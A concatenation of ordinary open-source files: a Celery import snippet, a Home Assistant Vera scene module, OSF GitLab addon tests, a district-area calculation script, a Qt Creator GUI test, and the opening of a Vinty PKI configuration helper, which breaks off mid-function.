srazsae_dates_to_import = get_dates_to_import(WeatherObservation, 'srazsae.dat')
try:
g = group(import_hod_observation.s(date) for date in watercourse_dates_to_import)
g.apply_async()
except Exception as e:
logger.critical(e)
try:
g = group(import_srazsae_observation.s(date) for date in srazsae_dates_to_import)
g.apply_async()
except Exception as e:
logger.critical(e)
| bsd-3-clause |
Teagan42/home-assistant | homeassistant/components/vera/scene.py | 7 | 1421 | """Support for Vera scenes."""
import logging
from homeassistant.components.scene import Scene
from homeassistant.util import slugify
from . import VERA_CONTROLLER, VERA_ID_FORMAT, VERA_SCENES
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Vera scenes."""
add_entities(
[
VeraScene(scene, hass.data[VERA_CONTROLLER])
for scene in hass.data[VERA_SCENES]
],
True,
)
class VeraScene(Scene):
"""Representation of a Vera scene entity."""
def __init__(self, vera_scene, controller):
"""Initialize the scene."""
self.vera_scene = vera_scene
self.controller = controller
self._name = self.vera_scene.name
# Append device id to prevent name clashes in HA.
self.vera_id = VERA_ID_FORMAT.format(
slugify(vera_scene.name), vera_scene.scene_id
)
def update(self):
"""Update the scene status."""
self.vera_scene.refresh()
def activate(self):
"""Activate the scene."""
self.vera_scene.activate()
@property
def name(self):
"""Return the name of the scene."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the scene."""
return {"vera_scene_id": self.vera_scene.vera_scene_id}
| apache-2.0 |
Johnetordoff/osf.io | addons/gitlab/tests/test_views.py | 6 | 24875 | # -*- coding: utf-8 -*-
from rest_framework import status as http_status
import mock
import datetime
import pytest
import unittest
from json import dumps
from nose.tools import * # noqa (PEP8 asserts)
from tests.base import OsfTestCase, get_default_metaschema
from osf_tests.factories import ProjectFactory, UserFactory, AuthUserFactory, DraftRegistrationFactory
from github3.repos.branch import Branch
from framework.exceptions import HTTPError
from framework.auth import Auth
from addons.base.tests.views import (
OAuthAddonAuthViewsTestCaseMixin, OAuthAddonConfigViewsTestCaseMixin
)
from addons.gitlab import utils
from addons.gitlab.api import GitLabClient
from addons.gitlab.serializer import GitLabSerializer
from addons.gitlab.utils import check_permissions
from addons.gitlab.tests.utils import create_mock_gitlab, GitLabAddonTestCase
from addons.gitlab.tests.factories import GitLabAccountFactory
pytestmark = pytest.mark.django_db
class TestGitLabAuthViews(GitLabAddonTestCase, OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):
@mock.patch(
'addons.gitlab.models.UserSettings.revoke_remote_oauth_access',
mock.PropertyMock()
)
def test_delete_external_account(self):
super(TestGitLabAuthViews, self).test_delete_external_account()
def test_oauth_start(self):
pass
def test_oauth_finish(self):
pass
class TestGitLabConfigViews(GitLabAddonTestCase, OAuthAddonConfigViewsTestCaseMixin, OsfTestCase):
folder = None
Serializer = GitLabSerializer
client = GitLabClient
## Overrides ##
def setUp(self):
super(TestGitLabConfigViews, self).setUp()
self.mock_api_user = mock.patch('addons.gitlab.api.GitLabClient.user')
self.mock_api_user.return_value = mock.Mock()
self.mock_api_user.start()
def tearDown(self):
self.mock_api_user.stop()
super(TestGitLabConfigViews, self).tearDown()
def test_folder_list(self):
        # GitLab only lists the root folder (repos), so this test is superfluous
pass
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.views.GitLabClient.repo')
def test_set_config(self, mock_repo, mock_add_hook):
        # GitLab selects repos, not folders, so this needs to be overridden
mock_repo.return_value = 'repo_name'
url = self.project.api_url_for('{0}_set_config'.format(self.ADDON_SHORT_NAME))
res = self.app.post_json(url, {
'gitlab_user': 'octocat',
'gitlab_repo': 'repo_name',
'gitlab_repo_id': '123',
}, auth=self.user.auth)
assert_equal(res.status_code, http_status.HTTP_200_OK)
self.project.reload()
assert_equal(
self.project.logs.latest().action,
'{0}_repo_linked'.format(self.ADDON_SHORT_NAME)
)
mock_add_hook.assert_called_once_with(save=False)
# TODO: Test remaining CRUD methods
# TODO: Test exception handling
class TestCRUD(OsfTestCase):
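    """Scaffolding for gitlab CRUD tests: a project wired to a mocked gitlab repo."""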
def setUp(self):
super(TestCRUD, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = self.gitlab.repo.return_value.owner.login
self.node_settings.repo = self.gitlab.repo.return_value.name
self.node_settings.save()
class TestGitLabViews(OsfTestCase):
def setUp(self):
super(TestGitLabViews, self).setUp()
self.user = AuthUserFactory()
self.consolidated_auth = Auth(user=self.user)
self.project = ProjectFactory(creator=self.user)
self.non_authenticator = UserFactory()
self.project.add_contributor(
contributor=self.non_authenticator,
auth=self.consolidated_auth,
)
self.project.save()
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.project.creator.external_accounts.add(GitLabAccountFactory())
self.project.creator.save()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.node_settings = self.project.get_addon('gitlab')
self.node_settings.user_settings = self.project.creator.get_addon('gitlab')
# Set the node addon settings to correspond to the values of the mock repo
self.node_settings.user = 'fred'
self.node_settings.repo = 'mock-repo'
self.node_settings.repo_id = 1748448
self.node_settings.save()
def _get_sha_for_branch(self, branch=None, mock_branches=None):
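        """Return the commit sha for ``branch`` (the repo's default branch when None)."""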
gitlab_mock = self.gitlab
if mock_branches is None:
mock_branches = gitlab_mock.branches
if branch is None: # Get default branch name
branch = self.gitlab.repo.default_branch
for each in mock_branches:
if each.name == branch:
branch_sha = each.commit['id']
return branch_sha
# Tests for _get_refs
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_defaults(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings)
assert_equal(
branch,
gitlab_mock.repo.default_branch
)
assert_equal(sha, branches[0].commit['id']) # Get refs for default branch
assert_equal(
branches,
gitlab_mock.branches.return_value
)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_get_refs_branch(self, mock_repo, mock_branches):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
mock_branches.return_value = gitlab_mock.branches.return_value
branch, sha, branches = utils.get_refs(self.node_settings, 'master')
assert_equal(branch, 'master')
assert_equal(sha, branches[0].commit['id'])
assert_equal(
branches,
gitlab_mock.branches.return_value
)
def test_before_fork(self):
url = self.project.api_url + 'fork/before/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_equal(len(res.json['prompts']), 1)
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
def test_before_register(self, mock_has_auth):
mock_has_auth.return_value = True
url = self.project.api_url + 'beforeregister/'
res = self.app.get(url, auth=self.user.auth).maybe_follow()
assert_true('GitLab' in res.json['prompts'][1])
def test_get_refs_sha_no_branch(self):
with assert_raises(HTTPError):
utils.get_refs(self.node_settings, sha='12345')
# Tests for _check_permissions
# make a user with no authorization; make sure check_permissions returns false
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_auth(self, mock_repo):
gitlab_mock = self.gitlab
# project is set to private right now
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection = gitlab_mock
non_authenticated_user = UserFactory()
non_authenticated_auth = Auth(user=non_authenticated_user)
branch = 'master'
assert_false(check_permissions(self.node_settings, non_authenticated_auth, connection, branch, repo=mock_repository))
# make a repository that doesn't allow push access for this user;
# make sure check_permissions returns false
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_no_access(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
branch = 'master'
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, branch, repo=mock_repository))
# make a branch with a different commit than the commit being passed into check_permissions
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions_not_head(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_branch = mock.Mock(**{
'commit': {'id': '67890'}
})
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
connection.branches.return_value = mock_branch
sha = '12345'
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, mock_branch, sha=sha, repo=mock_repository))
# make sure permissions are not granted for editing a registration
@mock.patch('addons.gitlab.models.UserSettings.has_auth')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_permissions(self, mock_repo, mock_has_auth):
gitlab_mock = self.gitlab
mock_has_auth.return_value = True
connection = gitlab_mock
mock_repository = mock.Mock(**{
'user': 'fred',
'repo': 'mock-repo',
'permissions': {
'project_access': {'access_level': 20, 'notification_level': 3}
},
})
mock_repo.attributes.return_value = mock_repository
with mock.patch('osf.models.node.AbstractNode.is_registration', new_callable=mock.PropertyMock) as mock_is_reg:
mock_is_reg.return_value = True
assert_false(check_permissions(self.node_settings, self.consolidated_auth, connection, 'master', repo=mock_repository))
def check_hook_urls(self, urls, node, path, sha):
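        """Assert that the hook log urls point to the file view/download pages for the given sha."""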
url = node.web_url_for('addon_view_or_download_file', path=path, provider='gitlab')
expected_urls = {
'view': '{0}?branch={1}'.format(url, sha),
'download': '{0}?action=download&branch={1}'.format(url, sha)
}
assert_equal(urls['view'], expected_urls['view'])
assert_equal(urls['download'], expected_urls['download'])
@mock.patch('addons.gitlab.views.verify_hook_signature')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_hook_callback_add_file_not_thro_osf(self, mock_repo, mock_verify):
gitlab_mock = self.gitlab
gitlab_mock.repo = mock_repo
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{
'test': True,
'commits': [{
'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'],
'removed': [],
'modified': [],
}]
},
content_type='application/json',
).maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_added')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': ' foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io',
'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_updated')
urls = self.project.logs.latest().params['urls']
self.check_hook_urls(
urls,
self.project,
path='PRJWN3TV',
sha='b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
)
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_remove_file_not_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
timestamp = str(datetime.datetime.utcnow())
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'foo',
'timestamp': timestamp,
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed': ['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_equal(self.project.logs.latest().action, 'gitlab_file_removed')
urls = self.project.logs.latest().params['urls']
assert_equal(urls, {})
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_add_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Added via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': ['PRJWN3TV'], 'removed':[], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_added')
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_modify_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Updated via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':[], 'modified':['PRJWN3TV']}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_updated')
@mock.patch('addons.gitlab.views.verify_hook_signature')
def test_hook_callback_remove_file_thro_osf(self, mock_verify):
url = '/api/v1/project/{0}/gitlab/hook/'.format(self.project._id)
self.app.post_json(
url,
{'test': True,
'commits': [{'id': 'b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'distinct': True,
'message': 'Deleted via the Open Science Framework',
'timestamp': '2014-01-08T14:15:51-08:00',
'url': 'https://gitlab.com/tester/addontesting/commit/b08dbb5b6fcd74a592e5281c9d28e2020a1db4ce',
'author': {'name': 'Illidan', 'email': 'njqpw@osf.io'},
'committer': {'name': 'Testor', 'email': 'test@osf.io', 'username': 'tester'},
'added': [], 'removed':['PRJWN3TV'], 'modified':[]}]},
content_type='application/json').maybe_follow()
self.project.reload()
assert_not_equal(self.project.logs.latest().action, 'gitlab_file_removed')
class TestRegistrationsWithGitLab(OsfTestCase):
def setUp(self):
super(TestRegistrationsWithGitLab, self).setUp()
self.project = ProjectFactory.build()
self.project.save()
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.save()
class TestGitLabSettings(OsfTestCase):
def setUp(self):
super(TestGitLabSettings, self).setUp()
self.gitlab = create_mock_gitlab(user='fred', private=False)
self.project = ProjectFactory()
self.auth = self.project.creator.auth
self.consolidated_auth = Auth(user=self.project.creator)
self.project.add_addon('gitlab', auth=self.consolidated_auth)
self.project.creator.add_addon('gitlab')
self.node_settings = self.project.get_addon('gitlab')
self.user_settings = self.project.creator.get_addon('gitlab')
self.node_settings.user_settings = self.user_settings
self.node_settings.user = 'Queen'
self.node_settings.repo = 'Sheer-Heart-Attack'
self.node_settings.repo_id = 'sheer-heart-attack'
self.node_settings.save()
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
'gitlab_repo_id': 'abc',
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, 'queen')
assert_equal(self.node_settings.repo, 'night at the opera')
assert_equal(self.project.logs.latest().action, 'gitlab_repo_linked')
mock_add_hook.assert_called_once_with(save=False)
@mock.patch('addons.gitlab.models.NodeSettings.add_hook')
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_no_change(self, mock_repo, mock_add_hook):
gitlab_mock = self.gitlab
mock_repo.return_value = gitlab_mock.repo.return_value
log_count = self.project.logs.count()
url = self.project.api_url + 'gitlab/settings/'
self.app.post_json(
url,
{
'gitlab_user': self.node_settings.user,
'gitlab_repo': self.node_settings.repo,
'gitlab_repo_id': self.node_settings.repo_id,
},
auth=self.auth
).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.project.logs.count(), log_count)
assert_false(mock_add_hook.called)
@mock.patch('addons.gitlab.api.GitLabClient.repo')
def test_link_repo_non_existent(self, mock_repo):
mock_repo.return_value = None
url = self.project.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.api.GitLabClient.branches')
def test_link_repo_registration(self, mock_branches):
mock_branches.return_value = [
Branch.from_json(dumps({
'name': 'master',
'commit': {
'sha': '6dcb09b5b57875f334f61aebed695e2e4193db5e',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/c5b97d5ae6c19d5c5df71a34c7fbeeda2479ccbc',
}
})),
Branch.from_json(dumps({
'name': 'develop',
'commit': {
'sha': '6dcb09b5b57875asdasedawedawedwedaewdwdass',
'url': 'https://api.gitlab.com/repos/octocat/Hello-World/commits/cdcb09b5b57875asdasedawedawedwedaewdwdass',
}
}))
]
registration = self.project.register_node(
schema=get_default_metaschema(),
auth=self.consolidated_auth,
draft_registration=DraftRegistrationFactory(branched_from=self.project)
)
url = registration.api_url + 'gitlab/settings/'
res = self.app.post_json(
url,
{
'gitlab_user': 'queen',
'gitlab_repo': 'night at the opera',
},
auth=self.auth,
expect_errors=True
).maybe_follow()
assert_equal(res.status_code, 400)
@mock.patch('addons.gitlab.models.NodeSettings.delete_hook')
def test_deauthorize(self, mock_delete_hook):
url = self.project.api_url + 'gitlab/user_auth/'
self.app.delete(url, auth=self.auth).maybe_follow()
self.project.reload()
self.node_settings.reload()
assert_equal(self.node_settings.user, None)
assert_equal(self.node_settings.repo, None)
assert_equal(self.node_settings.user_settings, None)
assert_equal(self.project.logs.latest().action, 'gitlab_node_deauthorized')
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
mjharriso/ConDistAreas | ConDistAreas.py | 1 | 4102 | #Coded by Matthew Harrison, July, 2015.
#Read ESRI shapefiles and calculate district areas
#Using Albers Equal Area Projection for North America
#Including Alaska and Hawaii
from mpl_toolkits.basemap import Basemap
from pyproj import Proj
from shapely.geometry import LineString, Point, shape
import fiona
from fiona import collection
import numpy as np
import pandas
import argparse
#Shapefiles should have been downloaded from
#http://cdmaps.polisci.ucla.edu/
#and unzipped in the current directory.
#for con in np.arange(106,114):
for con in [114]:
fnam='districtShapes/districts'+str(con)+'.shp'
print fnam
districts=fiona.open(fnam)
lat1=districts.bounds[1]
lat2=districts.bounds[3]
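    # Albers Equal Area projection spanning the latitude bounds of these districts,
    # so polygon areas below come out in square metres.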
m = Proj(proj='aea',lat_1=lat1,lat_2=lat2,lat_0=np.mean((lat1,lat2)))
Districts=[]
for pol in fiona.open(fnam):
if pol['geometry'] is None:
print 'Bad polygon',pol['properties']
continue
# Polygons
coords=pol['geometry']['coordinates']
if pol['geometry']['type'] == 'Polygon':
lons=[];lats=[]
for c in coords[0]:
lons.append(c[0])
lats.append(c[1])
try:
x,y=m(lons,lats)
except:
print pol['properties']
print pol['geometry']['type']
raise
poly={'type':'Polygon','coordinates':[zip(x,y)]}
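            # Compute the centroid in projected metres, then convert back to lon/lat.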
center=shape(poly).centroid
ccoords= shape(center).coords[:][0]
xc=ccoords[0];yc=ccoords[1]
lonc,latc=m(xc,yc,inverse=True,radians=False)
Districts.append({'STATENAME':pol['properties']['STATENAME'],
'DISTRICT':pol['properties']['DISTRICT'],
'COUNTY':pol['properties']['COUNTY'],
'ID':pol['properties']['ID'],'area':shape(poly).area,'centroid':[lonc,latc]})
# print shape(poly).centroid
elif pol['geometry']['type'] == 'MultiPolygon':
# Multiple Polygons
for p in coords:
lons=[];lats=[]
for c in p[0]:
lons.append(c[0])
lats.append(c[1])
try:
x,y=m(lons,lats)
except:
print pol['properties']
print pol['geometry']['type']
raise
poly={'type':'Polygon','coordinates':[zip(x,y)]}
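                # Same centroid computation, repeated for each member polygon.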
center=shape(poly).centroid
ccoords= shape(center).coords[:][0]
xc=ccoords[0];yc=ccoords[1]
lonc,latc=m(xc,yc,inverse=True,radians=False)
Districts.append({'STATENAME':pol['properties']['STATENAME'],
'DISTRICT':pol['properties']['DISTRICT'],
'COUNTY':pol['properties']['COUNTY'],
'ID':pol['properties']['ID'],'area':shape(poly).area,'centroid':[lonc,latc]})
# print shape(poly).centroid.wkt
Districts=sorted(Districts,key=lambda d:(d['STATENAME'],int(d['DISTRICT'])))
# Write Areas to csv
filenam='areas'+str(con)+'.txt'
f=open(filenam,'w')
pr=None
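    # Rows are sorted by state and district, so polygons of the same district are
    # adjacent and their areas can be summed in a single pass.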
for d in Districts:
if pr is not None:
if d['STATENAME'] != pr['STATENAME']:
print d['STATENAME']
if d['DISTRICT']==pr['DISTRICT']:
a=a+d['area']
center.append(d['centroid'])
else:
line=pr['ID'],pr['DISTRICT'],'area='+str(a/1.e6),pr['STATENAME']+'\n'
f.write(','.join(line))
line=pr['ID'],pr['DISTRICT'],'centroid='+str(center)+'\n'
f.write(','.join(line))
a=d['area']
center=[d['centroid']]
pr=d.copy()
else:
pr=d.copy()
a=d['area']
center=[d['centroid']]
line=pr['ID'],pr['DISTRICT'],'area='+str(a/1.e6),pr['STATENAME']+'\n'
f.write(','.join(line))
line=pr['ID'],pr['DISTRICT'],'centroid='+str(center)+'\n'
f.write(','.join(line))
f.close()
| gpl-2.0 |
kuba1/qtcreator | tests/system/suite_editors/tst_basic_cpp_support/test.py | 6 | 6126 | #############################################################################
##
## Copyright (C) 2015 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms and
## conditions see http://www.qt.io/terms-conditions. For further information
## use the contact form at http://www.qt.io/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 or version 3 as published by the Free
## Software Foundation and appearing in the file LICENSE.LGPLv21 and
## LICENSE.LGPLv3 included in the packaging of this file. Please review the
## following information to ensure the GNU Lesser General Public License
## requirements will be met: https://www.gnu.org/licenses/lgpl.html and
## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, The Qt Company gives you certain additional
## rights. These rights are described in The Qt Company LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
source("../../shared/qtcreator.py")
def main():
projectDir = os.path.join(srcPath, "creator", "tests", "manual", "cplusplus-tools")
proFileName = "cplusplus-tools.pro"
if not neededFilePresent(os.path.join(projectDir, proFileName)):
return
# copy example project to temp directory
tempDir = prepareTemplate(projectDir)
if not tempDir:
return
# make sure the .user files are gone
proFile = os.path.join(tempDir, proFileName)
cleanUpUserFiles(proFile)
startApplication("qtcreator" + SettingsPath)
if not startedWithoutPluginError():
return
openQmakeProject(proFile)
progressBarWait(20000)
selectFromLocator("dummy.cpp")
## Waiting for a solution from Froglogic to make the below work.
## There is an issue with slots that return a class type that wasn't running previously...
# editorManager = waitForObject("{type='Core::EditorManager'}", 2000)
# t2 = editorManager.currentEditor()
# t3 = t2.file()
# t4 = t3.fileName
# test.compare(editorManager.currentEditor().file().fileName, "base.cpp")
cppwindow = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")
# - Move the cursor to the usage of a variable.
# - Press F2 or select from the menu: Tools / C++ / Follow Symbol under Cursor
# Creator will show you the declaration of the variable.
type(cppwindow, "<Ctrl+f>")
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), " xi")
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "<Return>")
__typeAndWaitForAction__(cppwindow, "<F2>")
test.compare(lineUnderCursor(waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), "extern int xi;")
# - Move the cursor to a function call.
# - Press F2 or select from the menu: Tools / C++ / Follow Symbol under Cursor
# Creator will show you the definition of the function.
type(cppwindow, "<Ctrl+f>")
clickButton(waitForObject(":*Qt Creator_Utils::IconButton"))
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "freefunc2")
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "<Return>")
__typeAndWaitForAction__(cppwindow, "<F2>")
test.compare(lineUnderCursor(waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), "int freefunc2(double)")
# - Move the cursor to a function declaration
# - Press Shift+F2 or select from menu: Tools / C++ / Switch Between Method Declaration/Definition
# Creator should show the definition of this function
# - Press Shift+F2 or select from menu: Tools / C++ / Switch Between Method Declaration/Definition again
# Creator should show the declaration of the function again.
selectFromLocator("dummy.cpp")
mainWin = findObject(":Qt Creator_Core::Internal::MainWindow")
if not waitFor("'dummy.cpp ' in str(mainWin.windowTitle) and ' - cplusplus-tools - ' in str(mainWin.windowTitle)", 5000):
test.warning("Opening dummy.cpp seems to have failed")
# Reset cursor to the start of the document
if platform.system() == 'Darwin':
type(cppwindow, "<Home>")
else:
type(cppwindow, "<Ctrl+Home>")
type(cppwindow, "<Ctrl+f>")
clickButton(waitForObject(":*Qt Creator_Utils::IconButton"))
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "Dummy::Dummy")
# Take us to the second instance
type(waitForObject(":*Qt Creator.findEdit_Utils::FilterLineEdit"), "<Return>")
cppwindow = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")
__typeAndWaitForAction__(cppwindow, "<Shift+F2>")
test.compare(lineUnderCursor(findObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), " Dummy(int a);")
cppwindow = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")
snooze(2)
__typeAndWaitForAction__(cppwindow, "<Shift+F2>")
test.compare(lineUnderCursor(findObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget")), "Dummy::Dummy(int)")
invokeMenuItem("File", "Exit")
def __typeAndWaitForAction__(editor, keyCombination):
origTxt = str(editor.plainText)
cursorPos = editor.textCursor().position()
type(editor, keyCombination)
if not waitFor("cppEditorPositionChanged(cursorPos) or origTxt != str(editor.plainText)", 2000):
test.warning("Waiting timed out...")
def cppEditorPositionChanged(origPos):
try:
editor = waitForObject(":Qt Creator_CppEditor::Internal::CPPEditorWidget", 500)
return editor.textCursor().position() != origPos
except:
return False
| lgpl-2.1 |
MumbleFysh/vinty | packages/pki/util.py | 3 | 6819 | #!/usr/bin/python
## Revision history ############################################################
__author__ = 'Wouter Eerdekens <info@fks.be>'
__date__ = '2011-08-12'
__version__ = 0.1
__history__ = """
2011-08-12 - Prepare for initial release <jeroen.hooyberghs@fks.be>
2006-07-26 - initial version.
"""
################################################################################
## Imports #####################################################################
import commands, os, re, sets, stat, string, sys, tempfile, zipfile
import pki
from ConfigParser import ConfigParser
from os import path
## Functions ###################################################################
def parse_config():
configFile = '/etc/vinty/vinty.cfg'
try:
cp = ConfigParser()
cp.readfp(open(configFile))
except:
cp = None
else:
if not test_config(cp):
cp = None
return cp
# ------------------------------------------------------------------------------
def test_config(config):
# -- Dictionary containing expected configuration sections and options
cfg = { 'openssl' : ('path', 'conf'),
'keys' : ('path', 'path_revoked', 'size', 'expire', 'country',
'province', 'city', 'org', 'ou', 'email'),
'ca' : ('name', 'expire', 'crl')
}
rv = True
for section in cfg.keys():
if not config.has_section(section):
rv = False
else:
for option in cfg[section]:
if not config.has_option(section, option):
